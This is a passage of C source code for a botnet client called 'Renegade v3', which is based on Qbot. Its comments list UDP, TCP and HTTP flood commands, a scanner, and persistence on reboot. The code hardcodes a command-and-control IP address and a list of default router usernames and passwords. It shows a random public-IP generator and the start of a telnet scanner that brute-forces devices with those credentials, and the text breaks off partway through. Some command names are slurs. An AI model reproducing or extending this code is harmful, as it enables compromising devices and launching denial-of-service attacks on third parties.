1
//       ____  _________________   _____________
2
//      / __ \/ ____/ ____/  _/ | / / ____/ ___/
3
//     / / / / __/ / /_   / //  |/ / __/  \__ \
4
//    / /_/ / /___/ __/ _/ // /|  / /___ ___/ /
5
//   /_____/_____/_/   /___/_/ |_/_____//____/
6

7
#define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
8
#define PAD_RIGHT 1
9
#define PAD_ZERO 2
10
#define PRINT_BUF_LEN 12
11
#define CMD_IAC   255
12
#define CMD_WILL  251
13
#define CMD_WONT  252
14
#define CMD_DO    253
15
#define CMD_DONT  254
16
#define OPT_SGA   3
17

18
//       _____   __________    __  ______  ___________
19
//      /  _/ | / / ____/ /   / / / / __ \/ ____/ ___/
20
//      / //  |/ / /   / /   / / / / / / / __/  \__ \
21
//    _/ // /|  / /___/ /___/ /_/ / /_/ / /___ ___/ /
22
//   /___/_/ |_/\____/_____/\____/_____/_____//____/
23

24
#include <stdlib.h>
25
#include <stdarg.h>
26
#include <stdio.h>
27
#include <sys/socket.h>
28
#include <sys/types.h>
29
#include <netinet/in.h>
30
#include <arpa/inet.h>
31
#include <netdb.h>
32
#include <signal.h>
33
#include <strings.h>
34
#include <string.h>
35
#include <sys/utsname.h>
36
#include <unistd.h>
37
#include <fcntl.h>
38
#include <errno.h>
39
#include <netinet/ip.h>
40
#include <netinet/udp.h>
41
#include <netinet/tcp.h>
42
#include <sys/wait.h>
43
#include <sys/ioctl.h>
44
#include <net/if.h>
45

46
// BOT DEVELOPER IS KENDRICK AND ONLY KENDRICK. I WORK ON THIS ALONE.
47
// SOME CODE IN THIS BOT WASN'T WRITTEN BY JUST ME, BUT HAS BEEN MODIFIED IN THE APPROPRIATE WAY.
48

49
//       ____  _______   _________________    ____  ______   _    _______
50
//      / __ \/ ____/ | / / ____/ ____/   |  / __ \/ ____/  | |  / /__  /
51
//     / /_/ / __/ /  |/ / __/ / / __/ /| | / / / / __/     | | / / /_ <
52
//    / _, _/ /___/ /|  / /___/ /_/ / ___ |/ /_/ / /___     | |/ /___/ /
53
//   /_/ |_/_____/_/ |_/_____/\____/_/  |_/_____/_____/     |___//____/
54

55
// WHAT IS THIS BOT?
56

57
// FIRSTLY THE BOT NAME IS RENEGADE
58
// THE ORIGINAL BOT NAME WAS QBOT BUT I DO NOT BELIEVE THAT IT SHOULD BE CALLED THIS ANYMORE.
59
// THIS BOT IS FOR A PEER TO PEER PROTOCOL BOTNET. YOU WILL HAVE THE BOTNET CONTROLLER V3 SOURCE WITH RENEGADE V3.
60
// THE DEVELOPER FOR THIS BOT IS KENDRICK. THESE BUILDS MAY HAVE SOME BUGS BUT I DO PLAN ON FIXING BUGS IN V4.
61

62
// WHAT ARE THE COMMANDS?
63

64
// THE COMMANDS GO AS FOLLOWS - BOT TRIGGER IS !*
65
// !* UDP IPV4 PORT TIME NETMASK PACKET-SIZE POLL-INTERVAL
66
// !* TCP IPV4 PORT TIME NETMASK PACKET-SIZE FLAGS POLL-INTERVAL
67
// !* HTTP HOSTNAME TIME
68
// !* SCANNER SSH/TEL ON | OFF - !* SCANNER OFF WILL KILL ALL SCANNING PROCESSES
69
// !* LUCKYLILDUDE - THIS WILL KILL ALL BOTS CONNECTED BUT THIS STRING CAN EASILY BE CHANGED.
70
// !* FUCKINGFAGGOT - PING BOTNET CONTROLLER TO MAKE SURE BOT IS ONLINE. HOWEVER THE BOTNET CONTROLLER WILL DO THIS FOR YOU EVERY MINUTE.
71

72
// WE NOW HAVE A SSH SCANNER BUILT INTO RENEGADE TOO. ONLY RUN ONE SCANNER AT A TIME UNLESS ON A SYSTEM THAT CAN
73
// HANDLE THE LARGE AMOUNT OF SOCKETS WITH BOTH RUNNING. (TOTAL 1024 SOCKETS)
74

75
//       _   _________       __   _______________  ________  ______  ___________
76
//      / | / / ____/ |     / /  / ____/ ____/   |/_  __/ / / / __ \/ ____/ ___/
77
//     /  |/ / __/  | | /| / /  / /_  / __/ / /| | / / / / / / /_/ / __/  \__ \
78
//    / /|  / /___  | |/ |/ /  / __/ / /___/ ___ |/ / / /_/ / _, _/ /___ ___/ /
79
//   /_/ |_/_____/  |__/|__/  /_/   /_____/_/  |_/_/  \____/_/ |_/_____//____/
80

81
// THERE ARE SOME NEW FEATURES TO RENEGADE V3
82
// - SSH SCANNER 
83
// - LAYER 7 GET FLOOD
84
// - AUTOMATIC EXECUTION OF BOT ON REBOOT (DEPENDS ON OS SYSTEM IS RUNNING)
85

86
//      __  ______  __________  __  ________   ________
87
//     / / / / __ \/ ____/ __ \/  |/  /  _/ | / / ____/
88
//    / / / / /_/ / /   / / / / /|_/ // //  |/ / / __
89
//   / /_/ / ____/ /___/ /_/ / /  / // // /|  / /_/ /
90
//   \____/_/    \____/\____/_/  /_/___/_/ |_/\____/
91

92
// I HAVE SOME UPCOMING UPDATES FOR RENEGADE V4 IN A FEW MONTHS.
93
// HERE IS WHAT I PLAN ON ADDING:
94
// - LAYER 7 POST FLOOD
95
// - EXPLOITING VARIOUS ROUTERS THAT HAVE VULNERABILITIES
96
// - ADDING NETWROKING TOOLS SUCH AS PING.
97

98

99
//      __________  _   __________________
100
//     / ____/ __ \/ | / / ____/  _/ ____/
101
//    / /   / / / /  |/ / /_   / // / __
102
//   / /___/ /_/ / /|  / __/ _/ // /_/ /
103
//   \____/\____/_/ |_/_/   /___/\____/
104

105
unsigned char *commServer[] =
106
{
107
	"94.140.120.196:23913"
108
};
109

110
int initConnection();
111
int getBogos(unsigned char *bogomips);
112
int getCores();
113
int getCountry(unsigned char *buf, int bufsize);
114
void makeRandomStr(unsigned char *buf, int length);
115
int sockprintf(int sock, char *formatStr, ...);
116
char *inet_ntoa(struct in_addr in);
117

118
int mainCommSock = 0, currentServer = -1, gotIP = 0;
119
uint32_t *pids;
120
uint32_t scanPid;
121
uint64_t numpids = 0;
122
struct in_addr ourIP;
123
unsigned char macAddress[6] = {0};
124

125
//      __  _______ __________        __   ____  ___   __________
126
//     / / / / ___// ____/ __ \     _/_/  / __ \/   | / ___/ ___/
127
//    / / / /\__ \/ __/ / /_/ /   _/_/   / /_/ / /| | \__ \\__ \
128
//   / /_/ /___/ / /___/ _, _/  _/_/    / ____/ ___ |___/ /__/ /
129
//   \____//____/_____/_/ |_|  /_/     /_/   /_/  |_/____/____/
130

131
char *usernames[] = {"root\0", "\0", "admin\0", "user\0", "guest\0", "ubnt\0", "telnet\0", "D-Link\0", "pi\0", "support\0"};
132
char *passwords[] = {"root\0", "\0", "admin\0", "user\0", "guest\0", "1234\0", "12345\0", "ubnt\0", "password\0", "dreambox\0", "telnet\0", "letmein\0", "epicrouter\0", "D-Link\0", "raspberry\0", "pi\0", "changeme\0", "support\0"};
133

134
#define PHI 0x9e3779b9
135
static uint32_t Q[4096], c = 362436;
136

137
void init_rand(uint32_t x)
138
{
139
	int i;
140

141
	Q[0] = x;
142
	Q[1] = x + PHI;
143
	Q[2] = x + PHI + PHI;
144

145
	for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
146
}
147

148
uint32_t rand_cmwc(void)
149
{
150
	uint64_t t, a = 18782LL;
151
	static uint32_t i = 4095;
152
	uint32_t x, r = 0xfffffffe;
153
	i = (i + 1) & 4095;
154
	t = a * Q[i] + c;
155
	c = (uint32_t)(t >> 32);
156
	x = t + c;
157
	if (x < c) {
158
		x++;
159
		c++;
160
	}
161
	return (Q[i] = r - x);
162
}
163

164
void trim(char *str)
165
{
166
	int i;
167
	int begin = 0;
168
	int end = strlen(str) - 1;
169

170
	while (isspace(str[begin])) begin++;
171

172
	while ((end >= begin) && isspace(str[end])) end--;
173
	for (i = begin; i <= end; i++) str[i - begin] = str[i];
174

175
	str[i - begin] = '\0';
176
}
177

178
static void printchar(unsigned char **str, int c)
179
{
180
	if (str) {
181
		**str = c;
182
		++(*str);
183
	}
184
	else (void)write(1, &c, 1);
185
}
186

187
static int prints(unsigned char **out, const unsigned char *string, int width, int pad)
188
{
189
	register int pc = 0, padchar = ' ';
190

191
	if (width > 0) {
192
		register int len = 0;
193
		register const unsigned char *ptr;
194
		for (ptr = string; *ptr; ++ptr) ++len;
195
		if (len >= width) width = 0;
196
		else width -= len;
197
		if (pad & PAD_ZERO) padchar = '0';
198
	}
199
	if (!(pad & PAD_RIGHT)) {
200
		for ( ; width > 0; --width) {
201
			printchar (out, padchar);
202
			++pc;
203
		}
204
	}
205
	for ( ; *string ; ++string) {
206
		printchar (out, *string);
207
		++pc;
208
	}
209
	for ( ; width > 0; --width) {
210
		printchar (out, padchar);
211
		++pc;
212
	}
213

214
	return pc;
215
}
216

217
static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase)
218
{
219
	unsigned char print_buf[PRINT_BUF_LEN];
220
	register unsigned char *s;
221
	register int t, neg = 0, pc = 0;
222
	register unsigned int u = i;
223

224
	if (i == 0) {
225
		print_buf[0] = '0';
226
		print_buf[1] = '\0';
227
		return prints (out, print_buf, width, pad);
228
	}
229

230
	if (sg && b == 10 && i < 0) {
231
		neg = 1;
232
		u = -i;
233
	}
234

235
	s = print_buf + PRINT_BUF_LEN-1;
236
	*s = '\0';
237

238
	while (u) {
239
		t = u % b;
240
		if( t >= 10 )
241
		t += letbase - '0' - 10;
242
		*--s = t + '0';
243
		u /= b;
244
	}
245

246
	if (neg) {
247
		if( width && (pad & PAD_ZERO) ) {
248
			printchar (out, '-');
249
			++pc;
250
			--width;
251
		}
252
		else {
253
			*--s = '-';
254
		}
255
	}
256

257
	return pc + prints (out, s, width, pad);
258
}
259

260
static int print(unsigned char **out, const unsigned char *format, va_list args )
261
{
262
	register int width, pad;
263
	register int pc = 0;
264
	unsigned char scr[2];
265

266
	for (; *format != 0; ++format) {
267
		if (*format == '%') {
268
			++format;
269
			width = pad = 0;
270
			if (*format == '\0') break;
271
			if (*format == '%') goto out;
272
			if (*format == '-') {
273
				++format;
274
				pad = PAD_RIGHT;
275
			}
276
			while (*format == '0') {
277
				++format;
278
				pad |= PAD_ZERO;
279
			}
280
			for ( ; *format >= '0' && *format <= '9'; ++format) {
281
				width *= 10;
282
				width += *format - '0';
283
			}
284
			if( *format == 's' ) {
285
				register char *s = (char *)va_arg( args, int );
286
				pc += prints (out, s?s:"(null)", width, pad);
287
				continue;
288
			}
289
			if( *format == 'd' ) {
290
				pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
291
				continue;
292
			}
293
			if( *format == 'x' ) {
294
				pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
295
				continue;
296
			}
297
			if( *format == 'X' ) {
298
				pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
299
				continue;
300
			}
301
			if( *format == 'u' ) {
302
				pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
303
				continue;
304
			}
305
			if( *format == 'c' ) {
306
				scr[0] = (unsigned char)va_arg( args, int );
307
				scr[1] = '\0';
308
				pc += prints (out, scr, width, pad);
309
				continue;
310
			}
311
		}
312
		else {
313
out:
314
			printchar (out, *format);
315
			++pc;
316
		}
317
	}
318
	if (out) **out = '\0';
319
	va_end( args );
320
	return pc;
321
}
322

323
int zprintf(const unsigned char *format, ...)
324
{
325
	va_list args;
326
	va_start( args, format );
327
	return print( 0, format, args );
328
}
329

330
int szprintf(unsigned char *out, const unsigned char *format, ...)
331
{
332
	va_list args;
333
	va_start( args, format );
334
	return print( &out, format, args );
335
}
336

337

338
int sockprintf(int sock, char *formatStr, ...)
339
{
340
	unsigned char *textBuffer = malloc(2048);
341
	memset(textBuffer, 0, 2048);
342
	char *orig = textBuffer;
343
	va_list args;
344
	va_start(args, formatStr);
345
	print(&textBuffer, formatStr, args);
346
	va_end(args);
347
	orig[strlen(orig)] = '\n';
348
	zprintf("buf: %s\n", orig);
349
	int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
350
	free(orig);
351
	return q;
352
}
353

354
static int *fdopen_pids;
355

356
int fdpopen(unsigned char *program, register unsigned char *type)
357
{
358
	register int iop;
359
	int pdes[2], fds, pid;
360

361
	if (*type != 'r' && *type != 'w' || type[1]) return -1;
362

363
	if (pipe(pdes) < 0) return -1;
364
	if (fdopen_pids == NULL) {
365
		if ((fds = getdtablesize()) <= 0) return -1;
366
		if ((fdopen_pids = (int *)malloc((unsigned int)(fds * sizeof(int)))) == NULL) return -1;
367
		memset((unsigned char *)fdopen_pids, 0, fds * sizeof(int));
368
	}
369

370
	switch (pid = vfork())
371
	{
372
	case -1:
373
		close(pdes[0]);
374
		close(pdes[1]);
375
		return -1;
376
	case 0:
377
		if (*type == 'r') {
378
			if (pdes[1] != 1) {
379
				dup2(pdes[1], 1);
380
				close(pdes[1]);
381
			}
382
			close(pdes[0]);
383
		} else {
384
			if (pdes[0] != 0) {
385
				(void) dup2(pdes[0], 0);
386
				(void) close(pdes[0]);
387
			}
388
			(void) close(pdes[1]);
389
		}
390
		_exit(127);
391
	}
392
	if (*type == 'r') {
393
		iop = pdes[0];
394
		(void) close(pdes[1]);
395
	} else {
396
		iop = pdes[1];
397
		(void) close(pdes[0]);
398
	}
399
	fdopen_pids[iop] = pid;
400
	return (iop);
401
}
402

403
int fdpclose(int iop)
404
{
405
	register int fdes;
406
	sigset_t omask, nmask;
407
	int pstat;
408
	register int pid;
409

410
	if (fdopen_pids == NULL || fdopen_pids[iop] == 0) return (-1);
411
	(void) close(iop);
412
	sigemptyset(&nmask);
413
	sigaddset(&nmask, SIGINT);
414
	sigaddset(&nmask, SIGQUIT);
415
	sigaddset(&nmask, SIGHUP);
416
	(void) sigprocmask(SIG_BLOCK, &nmask, &omask);
417
	do {
418
		pid = waitpid(fdopen_pids[iop], (int *) &pstat, 0);
419
	} while (pid == -1 && errno == EINTR);
420
	(void) sigprocmask(SIG_SETMASK, &omask, NULL);
421
	fdopen_pids[fdes] = 0;
422
	return (pid == -1 ? -1 : WEXITSTATUS(pstat));
423
}
424

425
unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd)
426
{
427
	int got = 1, total = 0;
428
	while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
429
	return got == 0 ? NULL : buffer;
430
}
431

432
static const long hextable[] = {
433
	[0 ... 255] = -1,
434
	['0'] = 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
435
	['A'] = 10, 11, 12, 13, 14, 15,
436
	['a'] = 10, 11, 12, 13, 14, 15
437
};
438

439
long parseHex(unsigned char *hex)
440
{
441
	long ret = 0;
442
	while (*hex && ret >= 0) ret = (ret << 4) | hextable[*hex++];
443
	return ret;
444
}
445

446
int wildString(const unsigned char* pattern, const unsigned char* string) {
447
	switch(*pattern)
448
	{
449
	case '\0': return *string;
450
	case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1));
451
	case '?': return !(*string && !wildString(pattern+1, string+1));
452
	default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1));
453
	}
454
}
455

456
int getHost(unsigned char *toGet, struct in_addr *i)
457
{
458
	struct hostent *h;
459
	if((i->s_addr = inet_addr(toGet)) == -1) return 1;
460
	return 0;
461
}
462

463
void uppercase(unsigned char *str)
464
{
465
	while(*str) { *str = toupper(*str); str++; }
466
}
467

468
int getBogos(unsigned char *bogomips)
469
{
470
	int cmdline = open("/proc/cpuinfo", O_RDONLY);
471
	char linebuf[4096];
472
	while(fdgets(linebuf, 4096, cmdline) != NULL)
473
	{
474
		uppercase(linebuf);
475
		if(strstr(linebuf, "BOGOMIPS") == linebuf)
476
		{
477
			unsigned char *pos = linebuf + 8;
478
			while(*pos == ' ' || *pos == '\t' || *pos == ':') pos++;
479
			while(pos[strlen(pos)-1] == '\r' || pos[strlen(pos)-1] == '\n') pos[strlen(pos)-1]=0;
480
			if(strchr(pos, '.') != NULL) *strchr(pos, '.') = 0x00;
481
			strcpy(bogomips, pos);
482
			close(cmdline);
483
			return 0;
484
		}
485
		memset(linebuf, 0, 4096);
486
	}
487
	close(cmdline);
488
	return 1;
489
}
490

491
int getCores()
492
{
493
	int totalcores = 0;
494
	int cmdline = open("/proc/cpuinfo", O_RDONLY);
495
	char linebuf[4096];
496
	while(fdgets(linebuf, 4096, cmdline) != NULL)
497
	{
498
		uppercase(linebuf);
499
		if(strstr(linebuf, "BOGOMIPS") == linebuf) totalcores++;
500
		memset(linebuf, 0, 4096);
501
	}
502
	close(cmdline);
503
	return totalcores;
504

505
}
506

507
void makeRandomStr(unsigned char *buf, int length)
508
{
509
	int i = 0;
510
	for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
511
}
512

513
int recvLine(int socket, unsigned char *buf, int bufsize)
514
{
515
	memset(buf, 0, bufsize);
516

517
	fd_set myset;
518
	struct timeval tv;
519
	tv.tv_sec = 30;
520
	tv.tv_usec = 0;
521
	FD_ZERO(&myset);
522
	FD_SET(socket, &myset);
523
	int selectRtn, retryCount;
524
	if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
525
		while(retryCount < 10)
526
		{
527
			sockprintf(mainCommSock, "PING");
528

529
			tv.tv_sec = 30;
530
			tv.tv_usec = 0;
531
			FD_ZERO(&myset);
532
			FD_SET(socket, &myset);
533
			if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
534
				retryCount++;
535
				continue;
536
			}
537

538
			break;
539
		}
540
	}
541

542
	unsigned char tmpchr;
543
	unsigned char *cp;
544
	int count = 0;
545

546
	cp = buf;
547
	while(bufsize-- > 1)
548
	{
549
		if(recv(mainCommSock, &tmpchr, 1, 0) != 1) {
550
			*cp = 0x00;
551
			return -1;
552
		}
553
		*cp++ = tmpchr;
554
		if(tmpchr == '\n') break;
555
		count++;
556
	}
557
	*cp = 0x00;
558

559
	return count;
560
}
561

562
int connectTimeout(int fd, char *host, int port, int timeout)
563
{
564
	struct sockaddr_in dest_addr;
565
	fd_set myset;
566
	struct timeval tv;
567
	socklen_t lon;
568

569
	int valopt;
570
	long arg = fcntl(fd, F_GETFL, NULL);
571
	arg |= O_NONBLOCK;
572
	fcntl(fd, F_SETFL, arg);
573

574
	dest_addr.sin_family = AF_INET;
575
	dest_addr.sin_port = htons(port);
576
	if(getHost(host, &dest_addr.sin_addr)) return 0;
577
	memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
578
	int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
579

580
	if (res < 0) {
581
		if (errno == EINPROGRESS) {
582
			tv.tv_sec = timeout;
583
			tv.tv_usec = 0;
584
			FD_ZERO(&myset);
585
			FD_SET(fd, &myset);
586
			if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
587
				lon = sizeof(int);
588
				getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
589
				if (valopt) return 0;
590
			}
591
			else return 0;
592
		}
593
		else return 0;
594
	}
595

596
	arg = fcntl(fd, F_GETFL, NULL);
597
	arg &= (~O_NONBLOCK);
598
	fcntl(fd, F_SETFL, arg);
599

600
	return 1;
601
}
602

603
int listFork()
604
{
605
	uint32_t parent, *newpids, i;
606
	parent = fork();
607
	if (parent <= 0) return parent;
608
	numpids++;
609
	newpids = (uint32_t*)malloc((numpids + 1) * 4);
610
	for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
611
	newpids[numpids - 1] = parent;
612
	free(pids);
613
	pids = newpids;
614
	return parent;
615
}
616

617
int negotiate(int sock, unsigned char *buf, int len)
618
{
619
	unsigned char c;
620

621
	switch (buf[1]) {
622
	case CMD_IAC: return 0;
623
	case CMD_WILL:
624
	case CMD_WONT:
625
	case CMD_DO:
626
	case CMD_DONT:
627
		c = CMD_IAC;
628
		send(sock, &c, 1, MSG_NOSIGNAL);
629
		if (CMD_WONT == buf[1]) c = CMD_DONT;
630
		else if (CMD_DONT == buf[1]) c = CMD_WONT;
631
		else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
632
		else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
633
		send(sock, &c, 1, MSG_NOSIGNAL);
634
		send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
635
		break;
636

637
	default:
638
		break;
639
	}
640

641
	return 0;
642
}
643

644
int matchPrompt(char *bufStr)
645
{
646
	char *prompts = ":>%$#\0";
647

648
	int bufLen = strlen(bufStr);
649
	int i, q = 0;
650
	for(i = 0; i < strlen(prompts); i++)
651
	{
652
		while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
653
		if(*(bufStr + bufLen - q) == prompts[i]) return 1;
654
	}
655

656
	return 0;
657
}
658

659
int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex)
660
{
661
	int bufferUsed = initialIndex, got = 0, found = 0;
662
	fd_set myset;
663
	struct timeval tv;
664
	tv.tv_sec = timeout;
665
	tv.tv_usec = timeoutusec;
666
	unsigned char *initialRead = NULL;
667

668
	while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0))
669
	{
670
		FD_ZERO(&myset);
671
		FD_SET(fd, &myset);
672
		if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break;
673
		initialRead = buffer + bufferUsed;
674
		got = recv(fd, initialRead, 1, 0);
675
		if(got == -1 || got == 0) return 0;
676
		bufferUsed += got;
677
		if(*initialRead == 0xFF)
678
		{
679
			got = recv(fd, initialRead + 1, 2, 0);
680
			if(got == -1 || got == 0) return 0;
681
			bufferUsed += got;
682
			if(!negotiate(fd, initialRead, 3)) return 0;
683
		} else {
684
			if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer))) { found = 1; break; }
685
		}
686
	}
687

688
	if(found) return 1;
689
	return 0;
690
}
691

692
static uint8_t ipState[5];
693
in_addr_t getRandomPublicIP()
694
{
695
	if(ipState[1] < 255 && ipState[2] < 255 && ipState[3] < 255 && ipState[4] < 255)
696
        {
697
                ipState[1]++;
698
		ipState[2]++;
699
		ipState[3]++;
700
		ipState[4]++;
701
                char ip[16];
702
                szprintf(ip, "%d.%d.%d.%d", ipState[1], ipState[2], ipState[3], ipState[4]);
703
		return inet_addr(ip);
704
        }
705

706
	ipState[1] = rand() % 255;
707
	ipState[2] = rand() % 255;
708
        ipState[3] = rand() % 255;
709
	ipState[4] = rand() % 255;
710
        while(
711
                (ipState[1] == 0) ||
712
                (ipState[1] == 10) ||
713
                (ipState[1] == 100 && (ipState[2] >= 64 && ipState[2] <= 127)) ||
714
                (ipState[1] == 127) ||
715
                (ipState[1] == 169 && ipState[2] == 254) ||
716
                (ipState[1] == 172 && (ipState[2] <= 16 && ipState[2] <= 31)) ||
717
                (ipState[1] == 192 && ipState[2] == 0 && ipState[3] == 2) ||
718
                (ipState[1] == 192 && ipState[2] == 88 && ipState[3] == 99) ||
719
                (ipState[1] == 192 && ipState[2] == 168) ||
720
                (ipState[1] == 198 && (ipState[2] == 18 || ipState[2] == 19)) ||
721
                (ipState[1] == 198 && ipState[2] == 51 && ipState[3] == 100) ||
722
                (ipState[1] == 203 && ipState[2] == 0 && ipState[3] == 113) ||
723
                (ipState[1] >= 224)
724
        )
725
        {
726
                ipState[1] = rand() % 255;
727
        	ipState[2] = rand() % 255;
728
        	ipState[3] = rand() % 255;
729
		ipState[4] = rand() % 255;
730
        }
731

732
	char ip[16];
733
        szprintf(ip, "%d.%d.%d.%d", ipState[1], ipState[2], ipState[3], ipState[4]);
734
	return inet_addr(ip);
735
}
736

737
in_addr_t getRandomIP(in_addr_t netmask)
738
{
739
	in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
740
	return tmp ^ ( rand_cmwc() & ~netmask);
741
}
742

743
unsigned short csum (unsigned short *buf, int count)
744
{
745
	register uint64_t sum = 0;
746
	while( count > 1 ) { sum += *buf++; count -= 2; }
747
	if(count > 0) { sum += *(unsigned char *)buf; }
748
	while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
749
	return (uint16_t)(~sum);
750
}
751

752
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph)
753
{
754

755
	struct tcp_pseudo
756
	{
757
		unsigned long src_addr;
758
		unsigned long dst_addr;
759
		unsigned char zero;
760
		unsigned char proto;
761
		unsigned short length;
762
	} pseudohead;
763
	unsigned short total_len = iph->tot_len;
764
	pseudohead.src_addr=iph->saddr;
765
	pseudohead.dst_addr=iph->daddr;
766
	pseudohead.zero=0;
767
	pseudohead.proto=IPPROTO_TCP;
768
	pseudohead.length=htons(sizeof(struct tcphdr));
769
	int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
770
	unsigned short *tcp = malloc(totaltcp_len);
771
	memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
772
	memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
773
	unsigned short output = csum(tcp,totaltcp_len);
774
	free(tcp);
775
	return output;
776
}
777

778
void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize)
779
{
780
	iph->ihl = 5;
781
	iph->version = 4;
782
	iph->tos = 0;
783
	iph->tot_len = sizeof(struct iphdr) + packetSize;
784
	iph->id = rand_cmwc();
785
	iph->frag_off = 0;
786
	iph->ttl = MAXTTL;
787
	iph->protocol = protocol;
788
	iph->check = 0;
789
	iph->saddr = source;
790
	iph->daddr = dest;
791
}
792

793
int sclose(int fd)
794
{
795
	if(3 > fd) return 1;
796
	close(fd);
797
	return 0;
798
}
799

800
//     ______________    _   ______________   _____ _________    _   __
801
//    /_  __/ ____/ /   / | / / ____/_  __/  / ___// ____/   |  / | / /
802
//     / / / __/ / /   /  |/ / __/   / /     \__ \/ /   / /| | /  |/ /
803
//    / / / /___/ /___/ /|  / /___  / /     ___/ / /___/ ___ |/ /|  /
804
//   /_/ /_____/_____/_/ |_/_____/ /_/     /____/\____/_/  |_/_/ |_/
805

806
void TelnetScan()
807
{
808
	int max = (getdtablesize() / 4) * 3, i, res;
809
	fd_set myset;
810
	struct timeval tv;
811
	socklen_t lon;
812
	int valopt;
813

814
	max = max > 512 ? 512 : max;
815

816
	struct sockaddr_in dest_addr;
817
	dest_addr.sin_family = AF_INET;
818
	dest_addr.sin_port = htons(23);
819
	memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
820

821
	struct telstate_t
822
	{
823
		int fd;
824
		uint32_t ip;
825
		uint8_t state;
826
		uint8_t complete;
827
		uint8_t usernameInd;
828
		uint8_t passwordInd;
829
		uint32_t totalTimeout;
830
		uint16_t bufUsed;
831
		char *sockbuf;
832
	} fds[max];
833
	memset(fds, 0, max * (sizeof(int) + 1));
834
	for(i = 0; i < max; i++) { fds[i].complete = 1; fds[i].sockbuf = malloc(1024); memset(fds[i].sockbuf, 0, 1024); }
835
	struct timeval timeout;
836
        timeout.tv_sec = 8;
837
        timeout.tv_usec = 0;
838
	while(1)
839
	{
840
		for(i = 0; i < max; i++)
841
		{
842
			switch(fds[i].state)
843
			{
844
			case 0:
845
				{
846
					memset(fds[i].sockbuf, 0, 1024);
847

848
					if(fds[i].complete) { char *tmp = fds[i].sockbuf; memset(&(fds[i]), 0, sizeof(struct telstate_t)); fds[i].sockbuf = tmp; fds[i].ip = getRandomPublicIP(); }
849
					else {
850
						fds[i].passwordInd++;
851
						if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) { fds[i].passwordInd = 0; fds[i].usernameInd++; }
852
						if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) { fds[i].complete = 1; continue; }
853
					}
854
					dest_addr.sin_family = AF_INET;
855
					dest_addr.sin_port = htons(23);
856
					memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
857
					dest_addr.sin_addr.s_addr = fds[i].ip;
858
					fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
859
					if(fds[i].fd == -1) { continue; }
860
					fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
861
					if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) { sclose(fds[i].fd); fds[i].complete = 1; }
862
					else { fds[i].state = 1; fds[i].totalTimeout = 0; }
863
				}
864
				break;
865

866
			case 1:
867
				{
868
					if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
869

870
					FD_ZERO(&myset);
871
					FD_SET(fds[i].fd, &myset);
872
					tv.tv_sec = 0;
873
					tv.tv_usec = 10000;
874
					res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
875
					if(res == 1)
876
					{
877
						lon = sizeof(int);
878
						valopt = 0;
879
						getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
880
						if(valopt)
881
						{
882
							sclose(fds[i].fd);
883
							fds[i].state = 0;
884
							fds[i].complete = 1;
885
						} else {
886
							fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
887
							fds[i].totalTimeout = 0;
888
							fds[i].bufUsed = 0;
889
							memset(fds[i].sockbuf, 0, 1024);
890
							fds[i].state = 2;
891
							continue;
892
						}
893
					} else if(res == -1)
894
					{
895
						sclose(fds[i].fd);
896
						fds[i].state = 0;
897
						fds[i].complete = 1;
898
					}
899

900
					if(fds[i].totalTimeout + 10 < time(NULL))
901
					{
902
						sclose(fds[i].fd);
903
						fds[i].state = 0;
904
						fds[i].complete = 1;
905
					}
906
				}
907
